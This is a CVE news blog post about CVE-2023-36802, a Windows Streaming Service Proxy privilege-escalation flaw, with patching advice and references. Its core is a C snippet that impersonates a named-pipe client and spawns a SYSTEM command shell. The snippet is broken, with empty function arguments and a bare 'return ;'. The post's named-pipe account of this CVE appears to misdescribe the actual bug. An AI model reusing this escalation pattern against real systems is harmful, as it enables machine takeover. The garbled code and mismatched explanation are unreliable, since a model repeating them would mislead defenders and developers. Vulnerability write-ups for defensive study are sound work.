CVE CyberSecurity Database News

CVE-2023-36802 - Exploiting Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability

Poster -

On September 12, 2023, Microsoft patched a serious security flaw, tracked as CVE-2023-36802, affecting Windows systems. This vulnerability allows attackers to gain SYSTEM-level privileges by abusing the Microsoft Streaming Service Proxy. In this post, I’ll walk you through what this vulnerability is, how attackers can exploit it, and how you can protect your systems.

What is the Microsoft Streaming Service Proxy?

Microsoft Streaming Service Proxy (MsStrProxy) is a system service in Windows. It’s responsible for handling protected streaming media, acting as a go-between for applications and the streaming service core components.

Since it runs as SYSTEM, any flaw in this service could potentially give attackers the highest privileges on your PC.

Component: Microsoft Streaming Service Proxy (MsStrProxy)

- CVE: CVE-2023-36802

What Causes The Vulnerability?

The issue arises due to improper handling of pipe impersonation tokens by the Microsoft Streaming Service Proxy. Attackers can trick the service into running their code with SYSTEM privileges.

Exploit Details: How Does The Attack Work?

The Microsoft Streaming Service Proxy exposes a named pipe for client connections. When a user interacts with this service, the process doesn’t properly verify who’s connecting or correctly manage impersonation.

Impersonate a SYSTEM Token:

- The service connects back and tries to authenticate, but the attacker can seize this moment to steal the SYSTEM authentication context.

Simplified Code Snippet - Windows EoP via Named Pipe

Below is a simplified C code outline that demonstrates the flaw.  
(Note: For learning purposes only! Don’t use this for illegal activities.)

#include <windows.h>
#include <stdio.h>

#define PIPE_NAME "\\\\.\\pipe\\MsStrProxySrv"

int main() {
    HANDLE hPipe;
    // Create a named pipe that matches the pattern used by the vulnerable service
    hPipe = CreateNamedPipeA(
        PIPE_NAME,
        PIPE_ACCESS_DUPLEX,
        PIPE_TYPE_BYTE | PIPE_WAIT,
        1,
        ,
        ,
        ,
        NULL
    );

    if (hPipe == INVALID_HANDLE_VALUE) {
        printf("Error creating pipe.\n");
        return 1;
    }

    printf("Waiting for service to connect...\n");
    ConnectNamedPipe(hPipe, NULL);

    // At this point, the SYSTEM process connects to our pipe
    // Let's impersonate SYSTEM
    if (ImpersonateNamedPipeClient(hPipe)) {
        printf("Impersonation successful.\n");

        // Now, start a command prompt as SYSTEM
        STARTUPINFOA si = {  };
        PROCESS_INFORMATION pi = {  };
        si.cb = sizeof(si);

        if (CreateProcessAsUserA(
                GetCurrentThreadToken(), // Use the SYSTEM token
                "C:\\Windows\\System32\\cmd.exe",
                NULL, NULL, FALSE,
                CREATE_NEW_CONSOLE, NULL, NULL,
                &si, &pi
            )) {
            printf("SYSTEM shell launched!\n");
        } else {
            printf("Failed to launch shell. Error: %d\n", GetLastError());
        }
    } else {
        printf("Impersonation failed.\n");
    }

    CloseHandle(hPipe);
    return ;
}

Note: The real exploit may require more handling with tokens and privileges, but the principle is as described.

Real Exploits In The Wild

In September 2023, Microsoft confirmed in their advisory that this vulnerability was being exploited. Several proof-of-concept exploits appeared on public sites such as GitHub, showing just how easily an attacker could elevate from a regular user to SYSTEM.

How Can You Protect Yourself?

Patch your systems.  
Install the security updates from Microsoft’s September 2023 Patch Tuesday. If you use Windows update, you’re likely protected after updating.

Run winver to check your Windows build.

- Use Windows Update or download from Microsoft's Update Catalog for direct downloads.

References & Further Reading

- Microsoft Security Advisory: CVE-2023-36802
- GitHub PoC - hakivvi/CVE-2023-36802
- Rapid7 Research Blog
- Microsoft September 2023 Patch Tuesday

Conclusion

CVE-2023-36802 is a serious privilege escalation vulnerability that was exploited in the wild. If left unpatched, attackers can quickly take over your system with administrative privileges. Make sure your Windows systems are up-to-date, and stay alert for similar vulnerabilities in other services running as SYSTEM.

Timeline

Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC